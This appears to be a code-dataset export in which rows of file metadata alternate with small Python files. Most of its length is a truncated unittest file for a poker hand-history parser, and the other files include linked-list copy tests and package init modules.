| 33.141981 | 123 | 0.629183 | 6,035 | 70,261 | 7.219056 | 0.06512 | 0.047375 | 0.074024 | 0.059219 | 0.897376 | 0.890651 | 0.767668 | 0.762458 | 0.744141 | 0.739642 | 0 | 0.107615 | 0.248659 | 70,261 | 2,119 | 124 | 33.157622 | 0.717674 | 0.001338 | 0 | 0.719978 | 0 | 0 | 0.298997 | 0.071196 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002154 | 0 | 0.140011 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
888c1602b50aaee09393ecfce39a0ad10d18c748 | 8 | py | Python | examples/py30-0022-backticks6.py | jwilk-forks/python-grammar-changes | 5cbc14e520fadfef8539760a4ffdbe14b9d02f39 | [
"MIT"
] | 8 | 2020-11-21T22:39:41.000Z | 2022-03-13T18:45:53.000Z | examples/py30-0022-backticks6.py | jwilk-forks/python-grammar-changes | 5cbc14e520fadfef8539760a4ffdbe14b9d02f39 | [
"MIT"
] | 1 | 2021-12-10T10:45:38.000Z | 2021-12-10T10:45:38.000Z | examples/py30-0022-backticks6.py | jwilk-forks/python-grammar-changes | 5cbc14e520fadfef8539760a4ffdbe14b9d02f39 | [
"MIT"
] | 1 | 2022-02-07T11:16:38.000Z | 2022-02-07T11:16:38.000Z | `1,2,3`
| 4 | 7 | 0.375 | 3 | 8 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0.125 | 8 | 1 | 8 | 8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31f146af233745f9a5fa3505ad831058a5216371 | 52 | py | Python | test.py | bokonV2/TopUsersVkWeb | 63f1124e6ce204de8c564141c2b0be7314cdecb5 | [
"MIT"
] | null | null | null | test.py | bokonV2/TopUsersVkWeb | 63f1124e6ce204de8c564141c2b0be7314cdecb5 | [
"MIT"
] | null | null | null | test.py | bokonV2/TopUsersVkWeb | 63f1124e6ce204de8c564141c2b0be7314cdecb5 | [
"MIT"
] | null | null | null | print("\u0443\u0441\u043f\u0435\u0448\u043d\u043e")
| 26 | 51 | 0.769231 | 8 | 52 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.490196 | 0.019231 | 52 | 1 | 52 | 52 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0.807692 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
ee10b67f69f73254862c22ea4d37ee3659e92571 | 45 | py | Python | test/integration/tfp/models_data/test_disc_binary_data.py | spinkney/stanc3 | 41f78705dd8fa68759df61cfbab35540edcfe103 | [
"BSD-3-Clause"
] | 123 | 2018-11-22T01:34:47.000Z | 2022-02-06T17:41:05.000Z | test/integration/tfp/models_data/test_disc_binary_data.py | spinkney/stanc3 | 41f78705dd8fa68759df61cfbab35540edcfe103 | [
"BSD-3-Clause"
] | 947 | 2018-11-30T15:49:31.000Z | 2022-03-30T15:56:17.000Z | test/integration/tfp/models_data/test_disc_binary_data.py | spinkney/stanc3 | 41f78705dd8fa68759df61cfbab35540edcfe103 | [
"BSD-3-Clause"
] | 50 | 2019-02-14T15:13:39.000Z | 2022-03-18T18:14:17.000Z |
data = dict(y_bern = [0,0,0,0,0,1,1,1,1,0])
| 15 | 43 | 0.533333 | 14 | 45 | 1.642857 | 0.428571 | 0.347826 | 0.391304 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25641 | 0.133333 | 45 | 2 | 44 | 22.5 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ee35a26468c13becf81ba01f65bfc61037b8d61f | 179 | py | Python | pywicta/io/__init__.py | jeremiedecock/pywi-cta | 1185f7dfa48d60116472c12ffc423be78a250fc9 | [
"MIT"
] | null | null | null | pywicta/io/__init__.py | jeremiedecock/pywi-cta | 1185f7dfa48d60116472c12ffc423be78a250fc9 | [
"MIT"
] | 1 | 2018-03-23T15:44:10.000Z | 2018-03-23T15:44:10.000Z | pywicta/io/__init__.py | jeremiedecock/pywi-cta | 1185f7dfa48d60116472c12ffc423be78a250fc9 | [
"MIT"
] | 1 | 2018-10-02T08:34:53.000Z | 2018-10-02T08:34:53.000Z | """Input/output modules
This package contains modules used to load and save data (mostly images).
"""
from . import geometry_converter
from . import images
from . import simtel
| 19.888889 | 73 | 0.765363 | 25 | 179 | 5.44 | 0.76 | 0.220588 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162011 | 179 | 8 | 74 | 22.375 | 0.906667 | 0.530726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ee8cb075e1af059ed1e5917d5b7be355d472749f | 39 | py | Python | cython_mcpp/__init__.py | molpopgen/cython_mcpp | 06ecd8818b0dfc40c1c1d3777198178d689c5fdd | [
"Apache-2.0"
] | 3 | 2018-06-11T16:08:58.000Z | 2019-10-01T20:49:39.000Z | cython_mcpp/__init__.py | molpopgen/cython_mcpp | 06ecd8818b0dfc40c1c1d3777198178d689c5fdd | [
"Apache-2.0"
] | 1 | 2016-11-09T00:08:08.000Z | 2016-11-09T00:08:08.000Z | cython_mcpp/__init__.py | molpopgen/cython_mcpp | 06ecd8818b0dfc40c1c1d3777198178d689c5fdd | [
"Apache-2.0"
] | null | null | null | from .get_includes import get_includes
| 19.5 | 38 | 0.871795 | 6 | 39 | 5.333333 | 0.666667 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c9a7b7e1ea6fad021f3b6c16ba616a045108982e | 2,488 | py | Python | challenge_8/python/mjuiuc/test.py | rchicoli/2017-challenges | 44f0b672e5dea34de1dde131b6df837d462f8e29 | [
"Apache-2.0"
] | 271 | 2017-01-01T22:58:36.000Z | 2021-11-28T23:05:29.000Z | challenge_8/python/mjuiuc/test.py | AakashOfficial/2017Challenges | a8f556f1d5b43c099a0394384c8bc2d826f9d287 | [
"Apache-2.0"
] | 283 | 2017-01-01T23:26:05.000Z | 2018-03-23T00:48:55.000Z | challenge_8/python/mjuiuc/test.py | AakashOfficial/2017Challenges | a8f556f1d5b43c099a0394384c8bc2d826f9d287 | [
"Apache-2.0"
] | 311 | 2017-01-01T22:59:23.000Z | 2021-09-23T00:29:12.000Z | import unittest
import random
import time
from listNode import listNode
from solution import solution
class Tests(unittest.TestCase):
def test1(self):
# create linked list
temp = listNode()
head = temp
lop = list()
for i in xrange(1,11):
lop.append(temp)
temp.val = i
temp.next = listNode()
temp = temp.next
# assign random pointers
temp2 = head
while temp2 != None:
temp2.random = lop[random.randint(0,9)]
temp2 = temp2.next
# get the copied list head
t1 = time.time()
copiedHead = solution(head)
t2 = time.time()
# can't figure out a nice way to check the random pointers..
for i in lop:
# the actual test happens here
assert copiedHead.val == head.val, "error in value"
assert copiedHead.random.val == head.random.val, "error in random value"
copiedHead = copiedHead.next
head = head.next
print 'Runtime of test1: ' + str(t2 - t1)
def test2(self):
# create linked list
temp = listNode()
head = temp
lop = list()
for i in xrange(1,10001):
lop.append(temp)
temp.val = i
temp.next = listNode()
temp = temp.next
# assign random pointers
temp2 = head
while temp2 != None:
temp2.random = lop[random.randint(0,9999)]
temp2 = temp2.next
# get the copied list head
t1 = time.time()
copiedHead = solution(head)
t2 = time.time()
# can't figure out a nice way to check the random pointers..
for i in lop:
# the actual test happens here
assert copiedHead.val == head.val, "error in value"
assert copiedHead.random.val == head.random.val, "error in random value"
copiedHead = copiedHead.next
head = head.next
print 'Runtime of test2: ' + str(t2 - t1)
def test3(self):
# create linked list
temp = listNode()
head = temp
lop = list()
for i in xrange(1,100001):
lop.append(temp)
temp.val = i
temp.next = listNode()
temp = temp.next
# assign random pointers
temp2 = head
while temp2 != None:
temp2.random = lop[random.randint(0,99999)]
temp2 = temp2.next
# get the copied list head
t1 = time.time()
copiedHead = solution(head)
t2 = time.time()
# can't figure out a nice way to check the random pointers..
for i in lop:
# the actual test happens here
assert copiedHead.val == head.val, "error in value"
assert copiedHead.random.val == head.random.val, "error in random value"
copiedHead = copiedHead.next
head = head.next
print 'Runtime of test3: ' + str(t2 - t1)
if __name__ == '__main__':
unittest.main()
| 26.468085 | 75 | 0.667605 | 368 | 2,488 | 4.491848 | 0.192935 | 0.014519 | 0.021779 | 0.036298 | 0.867514 | 0.867514 | 0.867514 | 0.867514 | 0.867514 | 0.867514 | 0 | 0.032108 | 0.223875 | 2,488 | 93 | 76 | 26.752688 | 0.823925 | 0.186495 | 0 | 0.72973 | 0 | 0 | 0.083167 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 0 | null | null | 0 | 0.067568 | null | null | 0.040541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c9dcd49bda47fe4ee67f94a04a536a40a3ef6fe8 | 481,417 | py | Python | testy/testyAll.py | sfera2/Poker_DB_Creator | 24c1e1c5b6b20459f698f7492eda4b632f0c38e5 | [
"MIT"
] | null | null | null | testy/testyAll.py | sfera2/Poker_DB_Creator | 24c1e1c5b6b20459f698f7492eda4b632f0c38e5 | [
"MIT"
] | null | null | null | testy/testyAll.py | sfera2/Poker_DB_Creator | 24c1e1c5b6b20459f698f7492eda4b632f0c38e5 | [
"MIT"
] | null | null | null | import unittest
import sys
import os
f = os.getcwd()[:-5]
sys.path.append(f)
from Action import *
class TestReka(unittest.TestCase):
def test_ai(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'bug_ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
self.assertEqual('FLOP', hand.get_ai_street(), msg=file)
plrs = [str(p) for p in hand.get_players_ai_street('preflop')]
self.assertEqual(['fidas1972'], plrs,
msg=file)
plrs = [str(p) for p in hand.get_players_ai_street('flop')]
self.assertEqual(sorted(['fidas1972', 'Eddys Edge']), sorted(plrs),
msg=file)
plrs = [str(p) for p in hand.get_players_ai_street('turn')]
self.assertEqual(sorted(['Eddys Edge', 'fidas1972']), sorted(plrs),
msg=file)
file = 'ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
self.assertEqual('FLOP', hand.get_ai_street(), msg=file)
plrs = [str(p) for p in hand.get_players_ai()]
self.assertEqual(sorted(['Chodemuncher', 'Krumi1703']), sorted(plrs),
msg=file)
file = 'caip.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
self.assertEqual('PREFLOP', hand.get_ai_street(), msg=file)
plrs = [str(p) for p in hand.get_players_ai()]
self.assertEqual(sorted(['zambow20', 'fmljegvinder']), sorted(plrs),
msg=file)
class TestPreflop(unittest.TestCase):
def test_open_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FFFLIFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
file = '__P__FFFLFIF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(), msg=file + ' ' + player)
file = '__P__FFRFRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
file = '__P__FFFOFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_opp(),
msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_opp(),
msg=file + ' ' + player)
def test_open_(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FFFLIFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
file = '__P__FFRFRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
file = '__P__FFFOFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.open_(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.open_(), msg=file + ' ' + player)
def test_izo_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FFFLFIF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
file = '__P__FLFIFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
file = '__P__LLFIFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
file = '__P__LLIFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
file = '__P__FOFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo_opp(),
msg=file + ' ' + player)
def test_izo(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FFFLFIF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g6'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo(), msg=file + ' ' + player)
file = '__P__FLFIFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo(), msg=file + ' ' + player)
file = '__P__LLFIFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo(), msg=file + ' ' + player)
file = '__P__LLIFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.izo(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
file = '__P__FOFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.izo(), msg=file + ' ' + player)
def test_three_bet_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
file = '__P__LIFRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_opp(), msg=file + ' ' + player)
file = '__P__LICFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_opp(), msg=file + ' ' + player)
def test_three_bet(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet(), msg=file + ' ' + player)
file = '__P__FOCRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
file = '__P__LIFRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet(), msg=file + ' ' + player)
file = '__P__LICFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet(), msg=file + ' ' + player)
def test_three_bet_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOFRFFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOFRFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
